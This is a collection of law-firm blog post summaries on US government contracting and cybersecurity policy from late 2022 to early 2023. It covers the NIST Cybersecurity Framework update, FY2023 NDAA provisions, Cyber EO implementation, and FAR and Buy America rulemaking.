On January 19, 2023, the National Institute of Standards and Technology (“NIST”) published a Concept Paper setting out “Potential Significant Updates to the Cybersecurity Framework” and requesting public feedback and comments on the proposed revisions by March 3, 2023.  Originally released in 2014 and previously updated in 2018, the NIST CSF is a framework designed to assist organizations with developing, aligning, and prioritizing “cybersecurity activities with [] business/mission requirements, risk tolerances, and resources.”  Globally, organizations, industries, and government agencies have increasingly relied upon the Framework to establish cybersecurity programs and measure their maturity.  As the name suggests, the Concept Paper outlines potential significant updates to the Framework, and NIST previews that some of the proposed changes are “larger structural changes that may impact compatibility” with the current version of the Framework.  For example, NIST proposes expanding the Framework’s five functions (Identify, Protect, Detect, Respond, and Recover) to add a new function on cybersecurity governance (“Govern”). 

A new post on Covington’s Inside Privacy blog discusses the potential significant updates to the NIST Cybersecurity Framework.

The Department of Defense is seeking early input on implementation of the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 (the “FY2023 NDAA”) in the Federal Acquisition Regulation and Defense Federal Acquisition Regulation.  Although this early engagement process will not replace the formal rulemaking process, it presents a significant opportunity for government contractors, technology providers, industry associations, and other interested parties to provide their perspectives on acquisition-related provisions of this year’s NDAA.  Providing early input can ensure that industry’s perspective is heard.  Indeed, providing input at this stage may impact the future rulemaking process by guiding areas of focus and influencing ways the rule makers ask for input during the rulemaking process.

Continue Reading DoD Seeks Early Input Regarding FY2023 NDAA Implementation in Acquisition Regulations

On December 23, 2022, President Biden signed the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 (the “FY2023 NDAA”) into law.  As described in Covington’s Client Alert, FY23 NDAA: Provisions of Interest for Almost All Government Contractors, the FY23 NDAA contains provisions of interest for almost all U.S. Government contractors.  One provision likely to be of particular interest to U.S. contractors who provide or plan to provide cloud computing services to the U.S. Government is the FedRAMP Authorization Act (the “Act”), which codifies the Federal Risk and Authorization Management Program (“FedRAMP”).

Of note, the Act creates a “presumption of adequacy” that cloud providers with authorization from one agency can use that authorization with other agencies. This is an expansion compared to the current process which allows authorizations by the FedRAMP Joint Authorization Board, but not authorizations from individual agencies, to serve as the basis for an agency’s own authorization process.  It also creates the Federal Secure Cloud Advisory Committee, comprised of 15 members of the public and private sector, to provide recommendations regarding FedRAMP and the acquisition of cloud services more generally.

Continue Reading FY2023 NDAA Makes Notable Changes to FedRAMP Program

On December 23, 2022, President Biden signed the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 into law.  The Act contains two significant prohibitions regarding the procurement and use of semiconductor products and services from specific Chinese companies and other foreign countries of concern that will come into effect in December 2027. 

Continue Reading NDAA Prohibits Government Purchase and Use of Certain Semiconductors

In legislation passed last week, Congress directed the FAR Council to issue new rules for contractor organizational conflicts of interest.  The legislation itself did not create any new OCI standards, but provided factors for the council to consider, focusing on conflicts of interest for companies that act as consultants to the government.

It is unclear at this point what the precise nature and extent of the resulting changes to the OCI rules may be.  But the new law makes it likely that there will be some fairly significant revisions.  Congress set a deadline of Summer 2024 for the new regulations, so the contracting community should be on the lookout for a notice of proposed rulemaking in the coming months, and should not hesitate to submit comments for the government’s consideration.

Continue Reading New Contractor Conflict of Interest Rules May Be Coming Soon, with a Special Focus on Consulting and Advisory Contracts

As part of the FY23 National Defense Authorization Act (“NDAA”), Congress has given the Department of Defense authority to pay defense contractors for increased costs due to inflation.  Section 822 of the NDAA amends Public Law 85-804 (50 U.S.C. 1431) to allow contractors to apply for adjustments, while also giving the DoD wide discretion to grant or deny requests.  President Biden is expected to sign the FY23 NDAA soon, and Section 822 has the potential to be welcome news for contractors who have been battling inflation under multi-year, fixed-price contracts. 

As readers of this blog know from prior posts, DoD has issued position papers over the last year that attempt to address inflation with existing legal tools, but as a practical matter, the Department has provided few options for contractors impacted by rising costs.  The new NDAA provision could finally provide DoD with the legal support it needs to aid contractors struggling with inflation.  However, many questions remain about how this law will work and whether it will actually meet the growing needs of the defense industrial base.  In particular, Congress has not yet appropriated money to fund applications for relief, and DoD must prepare guidance for implementing the statute.  Both of these things will need to happen before contractors can apply for and potentially receive inflation-based price adjustments under this amended Public Law 85-804 authority.

This post discusses the amendment and analyzes the hurdles that remain between defense contractors and inflationary relief.

Continue Reading Congress Offers Greater Hope for Defense Contractors Battling Inflation; Actual Relief Is Still Not Clear

This is the nineteenth in a series of Covington blogs on implementation of Executive Order 14028, “Improving the Nation’s Cybersecurity,” issued by President Biden on May 12, 2021 (the “Cyber EO”).  The first blog summarized the Cyber EO’s key provisions and timelines, and the subsequent blogs described the actions taken by various Government agencies to implement the Cyber EO from June 2021 through October 2022.  This blog describes key actions taken to implement the Cyber EO during November 2022.

I. CISA, NSA, and ODNI Release Software Supply Chain Security Guide for Customers 

On November 17, 2022, the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Office of the Director of National Intelligence (ODNI) released the third in a series of recommended practice guides for securing the software supply chain (the “Customer Guide”).  The first practice guide in this series – published in September 2022 – was for software developers, and the second – published in October 2022 – was for software suppliers.  Each of the three guides is intended to supplement the Secure Software Development Framework (SSDF) published by the National Institute of Standards and Technology (NIST) pursuant to Section 4 of the Cyber EO.

The Customer Guide identifies key supply chain security objectives for software customers (acquirers) and recommends several broad categories of practices to achieve those objectives including security requirements planning, secure software architecture, and maintaining the security of software and the underlying infrastructure (e.g., environment, source code review, test).  For each of these practice categories, the guide identifies examples of scenarios that could be exploited (threat scenarios) and examples of controls that could be implemented to mitigate those threat scenarios. 

Section 2.1.3 of the Customer Guide is notable, and identifies objectives, scenarios, and mitigations for software acquisition contracts. This section highlights contracts that would be considered higher risk including (i) those with suppliers or sources under foreign control; (ii) contracts with incomplete security and supply chain requirements; (iii) missing software bills of material (“SBOMs”); (iv) suppliers with poor security hygiene, including those that have experienced a compromise that could impact their development cycle; and (v) suppliers who alter or substitute components in the product prior to package signing and hashing. 

To address some of these concerns, the guide recommends that such contracts incorporate a number of provisions designed to reduce supply chain risks.  Specific recommendations include:

  • Incorporation of forthcoming FAR/DFARS provisions for self-attestation from each supplier who provides products to U.S. Government customers that provide visibility into the provenance of each software product delivered;
  • A timeline or checklist of key steps that comprise the supplier’s security processes that were performed in the development of the product;
  • Signature by the supplier-designated official responsible for the security hygiene of the development process and infrastructure; and
  • A requirement for the supplier to provide cryptographic security for hashing/signature infrastructure of its product distribution system/method.

The Customer Guide also recommends that customers require suppliers to inform them on how to verify the integrity of all software components, including through:

  • Requiring the use of a hash or signature or similar method to ensure the integrity of each component and requiring each supplier to inform the customer on how to verify the integrity of the components;
  • Requiring that all artifacts sent by the supplier be in a standardized SBOM format;
  • Providing SBOMs for all upgrades;
  • Ensuring newly issued SBOMs incorporate all changes to the product baseline;
  • Providing continuous reporting for all of the supplier’s key attributes, such as its ownership, geolocation and foreign controls, as well as for any changes of the key attributes; and
  • Notifying the customer of cyber incidents and investigations, mitigations, and impacts to the product or the development environment of the product.

II. NIST Announces Project to Develop Guidance for Using DevSecOps Practices to Secure Software

On November 19, 2022, the NIST National Cybersecurity Center of Excellence (NCCoE) released a document, titled “Software Supply Chain And Devops Security Practices: Implementing a Risk-Based Approach to DevSecOps,” that describes its planned project to develop and document risk-based DevSecOps practices to secure software supply chains.  The document defines “DevSecOps” as the process of integrating security practices developed by a security team into existing “pipelines” such as continuous integration/continuous delivery (CI/CD) and existing toolchains used by developers and operators.  The document notes that the “project’s objective is to produce practical and actionable guidelines that meaningfully integrate security practices into development methodologies.” 

The DevSecOps project will ultimately result in the issuance of a publicly available NIST Cybersecurity Practice Guide that industry, government, and other organizations can use when choosing and implementing DevSecOps practices in order to improve the security of the software they develop and/or operate.  This guide will address how such organizations can generate artifacts as a by-product of their DevSecOps practices to support the organization’s self-attestations and compliance with applicable NIST and cybersecurity supply chain risk management practices.

III. DOD Issues Its Zero-Trust Strategy and Roadmap

On November 22, 2022, the Department of Defense (DOD) released its Zero Trust strategy for the next five years (FY23 – FY27).  According to the strategy, Zero Trust “uses continuous multi-factor authentication, micro-segmentation, advanced encryption, endpoint security, analytics, and robust auditing, among other capabilities, to fortify data, applications, assets, and services to deliver cyber resiliency.”  DOD’s strategy identifies four strategic principles, seven trust pillars, forty-five capabilities, and 152 activities involved in migrating DOD IT Systems to Zero Trust.  The strategy requires that DOD components reach the targeted level of Zero Trust—satisfaction of 91 of the 152 activities—by FY27, subject to a waiver process administered by DOD’s Zero Trust Portfolio Management Office.  Among others, the document lists “[i]ncorporate ZT requirements into DoD-wide and Component-specific strategies, policies, frameworks, and directives, and contracts by end of FY2023 and next iteration through FY 2027” as an objective of the strategy.

This is the eighteenth in a series of Covington blogs on implementation of Executive Order 14028, “Improving the Nation’s Cybersecurity,” issued by President Biden on May 12, 2021 (the “Cyber EO”).  The first blog summarized the Cyber EO’s key provisions and timelines, and the subsequent blogs described the actions taken by various Government agencies to implement the Cyber EO from June 2021 through September 2022.  This blog describes key actions taken to implement the Cyber EO during October 2022.

I.  CISA, NSA, and ODNI Release Software Supply Chain Security Guidance for Suppliers 

In October 2022, the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Office of the Director of National Intelligence (ODNI) released Part 2 in its series of recommended practice guides for securing the software supply chain (the “Supplier Guide”).  This second practice guide is for software suppliers—Part 1 of the guide is intended to be used by software developers, and the third (and final) guide will be targeted to software customers (i.e., acquirers).  Each of these guides is intended to supplement the Secure Software Development Framework (SSDF) published by the National Institute of Standards and Technology (NIST) pursuant to Section 4 of the Cyber EO.

According to the Supplier Guide, a software supplier acts as a liaison, or intermediary, between the developer and customer, and, as such, “retains primary responsibility over the following”:

  1. Maintaining the integrity of securely delivered software.
  2. Validating software packages and updates.
  3. Maintaining awareness of known vulnerabilities.
  4. Accepting customer reports of issues or newly discovered vulnerabilities and notifying developers for remediation.

The guide is intended to reflect “industry best practices and principles.”  It identifies key supplier objectives and recommends several broad categories of practices to achieve those objectives.  For each of these practice categories, the guide identifies scenarios that could be exploited (threat scenarios) and actions that could be taken to mitigate those threat scenarios.  For example, the guide outlines recommended mitigations for protecting the integrity of software code being developed either on premises or in a SaaS cloud solution, among many others.

The guide also has several appendices.  Of particular interest is Appendix C, “Supply-chain levels for Software Artifacts” (SLSA).  The SLSAs contained in this appendix address the four levels of security guidelines that are supposed to be tied to industry standards.   Appendix C designates which requirements apply to each of the four levels of SLSAs, with the fourth level representing the ideal end state for a secure software supply chain “from source to service.”

II. White House Issues Fact Sheet Detailing Past and Future Cybersecurity Efforts

On October 11, 2022, the Biden Administration issued a fact sheet that described various efforts that the Administration has undertaken to strengthen and safeguard the nation’s cybersecurity.  Among these efforts are several mandated by the Cyber EO.  The fact sheet demonstrates the Administration’s overall emphasis on implementation of the Cyber EO and its continued view of federal contracting as a lever to pull in that process.  Among other things, the fact sheet highlights that the Administration “issued a strategy for Federal zero trust architecture implementation, as well as budget guidance to ensure that Federal agencies align resources to our cybersecurity goals.”  Regarding procurement, the fact sheet states that “we are . . . harnessing the purchasing power of the Federal Government to improve the cybersecurity of products for the first time, by requiring security features in all software purchased by the Federal Government, which improves security for all Americans.”  As discussed in more detail below, the fact sheet also highlighted the White House’s plan to bring together private companies, associations, and Government agencies to discuss the development of a label for Internet of Things (IoT) devices “so that Americans can easily recognize which devices meet the highest cybersecurity standards to protect against hacking and other cyber vulnerabilities.”         

III. White House Holds Meeting to Discuss Cybersecurity Label for Consumer Internet-of-Things Devices

As previewed by the October 11 White House fact sheet (see section II above), the Biden Administration convened a meeting of representatives of industry, associations, and Government agencies on October 19, 2022 to discuss the Administration’s cybersecurity labelling program for IoT devices.  This program is based on labelling criteria developed by the IoT labelling pilot program conducted by NIST pursuant to the Cyber EO.  These criteria envision a physical label on the IoT device accompanied by a QR code that consumers could use to obtain further information regarding the cybersecurity vulnerabilities and resilience of the device, coupled with vendor self-attestations, and possible third-party certifications.  Speakers at the conference suggested that the Administration is planning a targeted rollout of a national cybersecurity labelling program in Spring 2023.

On December 1, 2022, the Department of Defense, General Services Administration, and NASA published a final rule addressing “Effective Communication Between Government and Industry,” which is aimed at “encourag[ing] communication between Government acquisition personnel and industry.”

The rule adds a paragraph to FAR 1.102-2 that reads as follows:

The Government must not hesitate to communicate with industry as early as possible in the acquisition cycle to help the Government determine the capabilities available in the marketplace.  Government acquisition personnel are permitted and encouraged to engage in responsible and constructive exchanges with industry (e.g., see 10.002 and 15.201), so long as those exchanges are consistent with existing laws and regulations, and do not promote an unfair competitive advantage to particular firms.

There were 19 comments on the proposed rule, which raised a range of issues, including potential changes to the FAR beyond Part 1; a desire for the rule to “require” (rather than “encourage”) communication between Government and industry; and concerns about “Rigid Regulatory Structure Inhibit[ing] Communication.”

The proposed rule also had invited public feedback on ways to enhance communication between the Government and industry, including “whether it may be beneficial to encourage or require contracting officers to conduct discussions with offerors after establishing the competitive range for contracts of a high dollar threshold.”  A number of respondents expressed support for encouraging or requiring discussions, while one respondent expressed concern that requiring discussions for all contracts “may unnecessarily slow the acquisition process.”

The final rule implements a section of the National Defense Authorization Act for Fiscal Year 2016, and has an effective date of December 30, 2022.

On November 4, 2022, the U.S. Department of Transportation (“DOT”) published two proposed waiver notices with request for comments related to the Bipartisan Infrastructure Law’s Build America, Buy America Act (“BABA”).  Both notices stated that DOT’s existing temporary waiver for construction materials would not be extended past its expiration on November 10, 2022.  One notice proposes a public interest waiver for certain narrow categories of contracts and solicitations to continue transitioning the construction materials standard.  The other notice proposes a public interest waiver for de minimis costs, small grants, and minor components.  Comments are due November 20, 2022 for both notices.

Continue Reading Department of Transportation Issues Two Proposed Waiver Notices for Build America, Buy America